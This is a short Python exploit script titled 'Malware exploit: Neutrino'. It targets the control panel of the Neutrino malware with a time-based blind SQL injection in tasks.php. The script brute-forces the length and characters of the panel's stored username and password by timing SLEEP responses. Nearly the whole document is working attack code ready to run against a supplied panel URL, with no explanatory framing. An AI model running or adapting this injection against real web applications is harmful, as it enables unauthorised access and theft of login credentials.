Malware exploit: Neutrino

<code>import requests
import time
import sys

wait_delay = 1


def brute_length(url, field):

    for i in range(0, 30):
        Injection = "/tasks.php?ip=1', (IF(LENGTH((SELECT %s FROM users WHERE uid='1')) = %d, SLEEP(%d), 0)), '1', '1', '1', '1', '1','1','1');-- -&amp;cn=1&amp;uid=1&amp;os=1&amp;av=1&amp;nat=1&amp;version=1&amp;phone=1&amp;serial=1&amp;quality=1&amp;getcmd=1" % (field, i, wait_delay)
        ConnectUrl  = url + Injection

        start = time.time() 
        r = requests.get(ConnectUrl)
        end = time.time()

        if((end - start) &gt;= wait_delay):
            return i

    return 0

def brute_char(url, field, position):

    sys.stdout.write(" ")
    sys.stdout.flush()

    for i in range(32, 127):
        Injection = "/tasks.php?ip=1', (IF(SUBSTRING((SELECT %s FROM users WHERE uid='1'), %d, 1) = BINARY CHAR(%d), SLEEP(%d), 0)), '1', '1', '1', '1', '1','1','1');-- -&amp;cn=1&amp;uid=1&amp;os=1&amp;av=1&amp;nat=1&amp;version=1&amp;phone=1&amp;serial=1&amp;quality=1&amp;getcmd=1" % (field, position, i, wait_delay)
        ConnectUrl = url + Injection

        sys.stdout.write("\b%c" % chr(i))
        sys.stdout.flush()

        start = time.time() 
        r = requests.get(ConnectUrl)
        end = time.time()

        if((end - start) &gt;= wait_delay):
            break

def brute_panel(url):

    print("Username: ", end="",flush=True);
    ulen = brute_length(url, "username");

    for i in range(1, ulen+1):
        brute_char(url, "username", i)

    print("\nPassword: ", end="",flush=True);
    plen = brute_length(url, "password");

    for i in range(1, plen+1):
        brute_char(url, "password", i)


if(len(sys.argv) &gt;= 2):
    brute_panel(sys.argv[1])
else:
    print("usage: neutrino.py http://panelurl.com/")
</code>